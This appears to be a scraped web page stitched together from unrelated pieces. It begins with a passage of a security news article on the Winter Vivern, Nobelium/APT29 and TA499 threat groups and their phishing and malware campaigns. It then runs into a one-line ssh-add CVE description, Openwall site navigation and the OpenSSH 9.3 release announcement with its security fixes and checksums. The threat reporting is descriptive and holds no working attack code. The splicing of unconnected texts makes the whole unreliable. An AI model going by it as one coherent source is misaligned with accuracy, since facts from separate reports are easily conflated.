Previous public reports chronicling the group show that it has leveraged weaponized Microsoft Excel documents containing XLM macros to deploy PowerShell implants on compromised hosts.

While the origins of the threat actor are unknown, the attack patterns suggest that the cluster is aligned with objectives that support the interests of Belarus and Russia's governments.

UAC-0114 has employed a variety of methods, ranging from phishing websites to malicious documents, that are tailored to the targeted organization to distribute its custom payloads and gain unauthorized access to sensitive systems.

In one set of attacks observed in mid-2022, Winter Vivern set up credential phishing web pages to lure users of the Indian government's legitimate email service email.gov\[.\]in.

Typical attack chains involve using batch scripts masquerading as virus scanners to trigger the deployment of the Aperetif trojan from actor-controlled infrastructure such as compromised WordPress sites.

Aperetif, a Visual C++-based malware, comes with features to collect victim data, maintain backdoor access, and retrieve additional payloads from the command-and-control (C2) server.

"The Winter Vivern APT is a resource-limited but highly creative group that shows restraint in the scope of their attacks," Hegel said.

"Their ability to lure targets into the attacks, and their targeting of governments and high-value private businesses demonstrate the level of sophistication and strategic intent in their operations."

While Winter Vivern may have managed to evade the public eye for extended periods of time, one group that's not too concerned about staying under the radar is Nobelium, which shares overlaps with APT29 (aka BlueBravo, Cozy Bear, or The Dukes).

The Kremlin-backed nation-state group, notorious for the SolarWinds supply chain compromise in December 2020, has continued to evolve its toolset, developing new custom malware like MagicWeb and GraphicalNeutrino.

It has also been attributed to yet another phishing campaign directed against diplomatic entities in the European Union, with specific emphasis on agencies that are "aiding Ukrainian citizens fleeing the country, and providing help to the government of Ukraine."

"Nobelium actively collects intelligence information about the countries supporting Ukraine in the Russia-Ukraine war," BlackBerry said. "The threat actors carefully follow geopolitical events and use them to increase their possibility of a successful infection."

The phishing emails, spotted by the company's research and intelligence team, contain a weaponized document that includes a link pointing to an HTML file.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

The weaponized URLs, hosted on a legitimate online library website based in El Salvador, features lures related to LegisWrite and eTrustEx, both of which are used by E.U. nations for secure document exchange.

The HTML dropper (dubbed ROOTSAW or EnvyScout) delivered in the campaign embeds an ISO image, which, in turn, is designed to launch a malicious dynamic link library (DLL) that facilitates the delivery of a next-stage malware via Notion's APIs.

The use of Notion, a popular note-taking application, for C2 communications was previously revealed by Recorded Future in January 2023. It's worth noting that APT29 has employed various online services like Dropbox, Google Drive, Firebase, and Trello in an attempt to evade detection.

"Nobelium remains highly active, executing multiple campaigns in parallel targeting government organizations, non-governmental organizations (NGOs), intergovernmental organizations (IGOs), and think tanks across the U.S., Europe, and Central Asia," Microsoft stated last month.

The findings also come as enterprise security firm Proofpoint disclosed aggressive email campaigns orchestrated by a Russia-aligned threat actor called TA499 (aka Lexus and Vovan) since early 2021 to trick targets into participating in recorded phone calls or video chats and extract valuable information.

"The threat actor has engaged in steady activity and expanded its targeting to include prominent businesspeople and high-profile individuals that have either made large donations to Ukrainian humanitarian efforts or those making public statements about Russian disinformation and propaganda," the company said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Winter Vivern APT Group Targeting Indian, Lithuanian, Slovakian, and Vatican Officials

ssh-add in OpenSSH before 9.3 adds smartcard keys to ssh-agent without the intended per-hop destination constraints.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 15 Mar 2023 17:18:38 -0600 (MDT)
From: Damien Miller <djm@....openbsd.org>
To: oss-security@...ts.openwall.com
Subject: Announce: OpenSSH 9.3 released

OpenSSH 9.3 has just been released. It will be available from the
mirrors listed at https://www.openssh.com/ shortly.

OpenSSH is a 100% complete SSH protocol 2.0 implementation and
includes sftp client and server support.

Once again, we would like to thank the OpenSSH community for their
continued support of the project, especially those who contributed
code or patches, reported bugs, tested snapshots or donated to the
project. More information on donations may be found at:
https://www.openssh.com/donations.html

Changes since OpenSSH 9.2
=========================

This release fixes a number of security bugs.

Security
========

This release contains fixes for a security problem and a memory
safety problem. The memory safety problem is not believed to be
exploitable, but we report most network-reachable memory faults as
security bugs.

 \* ssh-add(1): when adding smartcard keys to ssh-agent(1) with the
   per-hop desination constraints (ssh-add -h ...) added in OpenSSH
   8.9, a logic error prevented the constraints from being
   communicated to the agent. This resulted in the keys being added
   without constraints. The common cases of non-smartcard keys and
   keys without destination constraints are unaffected. This problem
   was reported by Luci Stanescu.

 \* ssh(1): Portable OpenSSH provides an implementation of the
   getrrsetbyname(3) function if the standard library does not
   provide it, for use by the VerifyHostKeyDNS feature. A
   specifically crafted DNS response could cause this function to
   perform an out-of-bounds read of adjacent stack data, but this
   condition does not appear to be exploitable beyond denial-of-
   service to the ssh(1) client.

   The getrrsetbyname(3) replacement is only included if the system's
   standard library lacks this function and portable OpenSSH was not
   compiled with the ldns library (--with-ldns). getrrsetbyname(3) is
   only invoked if using VerifyHostKeyDNS to fetch SSHFP records. This
   problem was found by the Coverity static analyzer.

New features
------------

 \* ssh-keygen(1), ssh-keyscan(1): accept -Ohashalg=sha1|sha256 when
   outputting SSHFP fingerprints to allow algorithm selection. bz3493
    
 \* sshd(8): add a \`sshd -G\` option that parses and prints the
   effective configuration without attempting to load private keys
   and perform other checks. This allows usage of the option before
   keys have been generated and for configuration evaluation and
   verification by unprivileged users.

Bugfixes
--------

 \* scp(1), sftp(1): fix progressmeter corruption on wide displays;
   bz3534

 \* ssh-add(1), ssh-keygen(1): use RSA/SHA256 when testing usability
   of private keys as some systems are starting to disable RSA/SHA1
   in libcrypto.

 \* sftp-server(8): fix a memory leak. GHPR363

 \* ssh(1), sshd(8), ssh-keyscan(1): remove vestigal protocol
   compatibility code and simplify what's left.

 \* Fix a number of low-impact Coverity static analysis findings.
   These include several reported via bz2687

 \* ssh\_config(5), sshd\_config(5): mention that some options are not
   first-match-wins.

 \* Rework logging for the regression tests. Regression tests will now
   capture separate logs for each ssh and sshd invocation in a test.

 \* ssh(1): make \`ssh -Q CASignatureAlgorithms\` work as the manpage
   says it should; bz3532.

 \* ssh(1): ensure that there is a terminating newline when adding a
   new entry to known\_hosts; bz3529

Portability
-----------

 \* sshd(8): harden Linux seccomp sandbox. Move to an allowlist of
   mmap(2), madvise(2) and futex(2) flags, removing some concerning
   kernel attack surface.

 \* sshd(8): improve Linux seccomp-bpf sandbox for older systems;
   bz3537

Checksums:
==========

- SHA1 (openssh-9.3.tar.gz) = 5f9d2f73ddfe94f3f0a78bdf46704b6ad7b66ec7
- SHA256 (openssh-9.3.tar.gz) = eRcXkFZByz70DUBUcyIdvU0pVxP2X280FrmV8pyUdrk=

- SHA1 (openssh-9.3p1.tar.gz) = 610959871bf8d6baafc3525811948f85b5dd84ab
- SHA256 (openssh-9.3p1.tar.gz) = 6bq6dwGnalHz2Fpiw4OjydzZf6kAuFm8fbEUwYaK+Kg=

Please note that the SHA256 signatures are base64 encoded and not
hexadecimal (which is the default for most checksum tools). The PGP
key used to sign the releases is available from the mirror sites:
https://cdn.openbsd.org/pub/OpenBSD/OpenSSH/RELEASE\_KEY.asc

Reporting Bugs:
===============

- Please read https://www.openssh.com/report.html
  Security bugs should be reported directly to openssh@...nssh.com

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

Tag

#mac